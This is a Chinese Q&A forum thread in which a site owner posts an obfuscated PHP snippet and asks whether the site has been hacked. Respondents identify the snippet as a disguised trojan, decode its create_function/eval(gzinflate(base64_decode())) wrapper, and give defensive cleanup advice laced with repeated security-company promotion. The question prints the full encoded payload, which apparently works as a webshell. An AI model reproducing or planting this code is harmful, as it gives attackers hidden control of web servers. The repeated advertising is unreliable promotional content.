帮我解段php代码,不知道是不是被挂马了 20

<?php$md5="3f31b448b9638836483529ef0e88adad";$ac=array('4','r','b',"6",")",'z','s','g... <?php
$md5 = "3f31b448b9638836483529ef0e88adad";
$ac = array('4','r','b',"6",")",'z','s','g',"l","v","o",";","d","$","t",'(','a','c',"e","n",'i',"_","f");
$bc0 = create_function('$'.'v',$ac[18].$ac[9].$ac[16].$ac[8].$ac[15].$ac[7].$ac[5].$ac[20].$ac[19].$ac[22].$ac[8].$ac[16].$ac[14].$ac[18].$ac[15].$ac[2].$ac[16].$ac[6].$ac[18].$ac[3].$ac[0].$ac[21].$ac[12].$ac[18].$ac[17].$ac[10].$ac[12].$ac[18].$ac[15].$ac[13].$ac[9].$ac[4].$ac[4].$ac[4].$ac[11]);
$bc0('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');
?>
展开
 我来答
匿名用户
2012-09-21
展开全部
一看就是加密了的木马代码。 你网站肯定是被黑客入侵了,一般网站有漏洞才会被黑客入侵并挂马,建议找专业的网站安全公司来给你解决网站被黑客入侵挂马和篡改这个问题,国内最有名的安全公司也就sinesafe和绿盟。

建站一段时间后总能听得到什么什么网站被挂马,什么网站被黑,被攻击。好像入侵挂马似乎是件很简单的事情。其实,入侵不简单,简单的是你的网站的必要安全措施并未做好。
有条件建议找专业做网站安全的sine安全来做安全维护。

一:挂马预防措施:

1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。

2、定期对网站进行安全的检测,具体可以利用网上一些工具,如sinesafe网站挂马检测工具!

序,只要可以上传文件的asp都要进行身份认证!

3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。

4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。

5、要尽量保持程序是最新版本。

6、不要在网页上加注后台管理程序登陆页面的链接。

7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。

8、要时常备份数据库等重要文件。

9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!

10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。

11、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程

二:挂马恢复措施:

1.修改帐号密码

不管是商业或不是,初始密码多半都是admin。因此你接到网站程序第一件事情就是“修改帐号密码”。帐号

密码就不要在使用以前你习惯的,换点特别的。尽量将字母数字及符号一起。此外密码最好超过15位。尚若你使用

SQL的话应该使用特别点的帐号密码,不要在使用什么什么admin之类,否则很容易被入侵。

2.创建一个robots.txt

Robots能够有效的防范利用搜索引擎窃取信息的骇客。

3.修改后台文件

第一步:修改后台里的验证文件的名称。

第二步:修改conn.asp,防止非法下载,也可对数据库加密后在修改conn.asp。

第三步:修改ACESS数据库名称,越复杂越好,可以的话将数据所在目录的换一下。

4.限制登陆后台IP

此方法是最有效的,每位虚拟主机用户应该都有个功能。你的IP不固定的话就麻烦点每次改一下咯,安全第一嘛。

5.自定义404页面及自定义传送ASP错误信息

404能够让骇客批量查找你的后台一些重要文件及检查网页是否存在注入漏洞。

ASP错误嘛,可能会向不明来意者传送对方想要的信息。

6.慎重选择网站程序

注意一下网站程序是否本身存在漏洞,好坏你我心里该有把秤。

7.谨慎上传漏洞

据悉,上传漏洞往往是最简单也是最严重的,能够让黑客或骇客们轻松控制你的网站。

可以禁止上传或着限制上传的文件类型。不懂的话可以找专业做网站安全的sinesafe公司。

8. cookie 保护

登陆时尽量不要去访问其他站点,以防止 cookie 泄密。切记退出时要点退出在关闭所有浏览器。

9.目录权限

请管理员设置好一些重要的目录权限,防止非正常的访问。如不要给上传目录执行脚本权限及不要给非上传目录给于写入权。

10.自我测试

如今在网上黑客工具一箩筐,不防找一些来测试下你的网站是否OK。

11.例行维护

a.定期备份数据。最好每日备份一次,下载了备份文件后应该及时删除主机上的备份文件。

b.定期更改数据库的名字及管理员帐密。

c.借WEB或FTP管理,查看所有目录体积,最后修改时间以及文件数,检查是文件是否有异常,以及查看是否有异常的账号。

网站被挂马一般都是网站程序存在漏洞或者服务器安全性能不达标被不法黑客入侵攻击而挂马的。

网站被挂马是普遍存在现象然而也是每一个网站运营者的心腹之患。

您是否因为网站和服务器天天被入侵挂马等问题也曾有过想放弃的想法呢,您否也因为不太了解网站技术的问题而耽误了网站的运营,您是否也因为精心运营的网站反反复复被一些无聊的黑客入侵挂马感到徬彷且很无耐。有条件建议找专业做网站安全的sine安全来做安全维护。
匿名用户
2012-09-29
展开全部
是的 着是加密的隐蔽性 php脚本木马

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了
网站挂马是每个网站最头痛的问题,解决办法:1.在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉
听朋友说 SineSafe 不错 你可以去看看。
清马+修补漏洞=彻底解决
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒
清马
1、找挂马的标签,比如有<script language="javascript" src="网马地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=网马地址></iframe>,或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马,一般是JS挂马。
2、找到了恶意代码后,接下来就是清马,如果是网页被挂马,可以用手动清,也可以用批量清,网页清马比较简单,这里就不详细讲,现在着重讲一下SQL数据库清马,用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”, 解释一下这一句子的意思:把字段名里的内容包含aaa的替换成空,这样子就可以一个表一个表的批量删除网马。
在你的网站程序或数据库没有备份情况下,可以实行以上两步骤进行清马,如果你的网站程序有备份的话,直接覆盖原来的文件即可。
修补漏洞(修补网站漏洞也就是做一下网站安全。)
1、修改网站后台的用户名和密码及后台的默认路径。
2、更改数据库名,如果是ACCESS数据库,那文件的扩展名最好不要用mdb,改成ASP的,文件名也可以多几个特殊符号。
3、接着检查一下网站有没有注入漏洞或跨站漏洞,如果有的话就相当打上防注入或防跨站补丁。
4、检查一下网站的上传文件,常见了有欺骗上传漏洞,就对相应的代码进行过滤。
5、尽可能不要暴露网站的后台地址,以免被社会工程学猜解出管理用户和密码。
6、写入一些防挂马代码,让框架代码等挂马无效。
7、禁用FSO权限也是一种比较绝的方法。
8、修改网站部分文件夹的读写权限。
9、如果你是自己的服务器,那就不仅要对你的网站程序做一下安全了,而且要对你的服务器做一下安全也是很有必要了!
网站被挂马是普遍存在现象然而也是每一个网站运营者的心腹之患。
您是否因为网站和服务器天天被入侵挂马等问题也曾有过想放弃的想法呢,您否也因为不太了解网站技术的问题而耽误了网站的运营,您是否也因为精心运营的网站反反复复被一些无聊的黑客入侵挂马感到徬彷且很无耐。有条件建议找专业做网站安全的sine安全来做安全维护。
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
a125373978
2012-09-21 · TA获得超过425个赞
知道小有建树答主
回答量:549
采纳率:57%
帮助的人:235万
展开全部
他先创建了这个函数
function($v){
eval(gzinflate(base64_decode($v)));

}
然后把下面这一大坨个进去运行了;
base64_decode($v)之后发现是个乱码,看不出来是不是木马
不过既然用到了eval函数,还是谨慎点好
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
收起 更多回答(1)
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式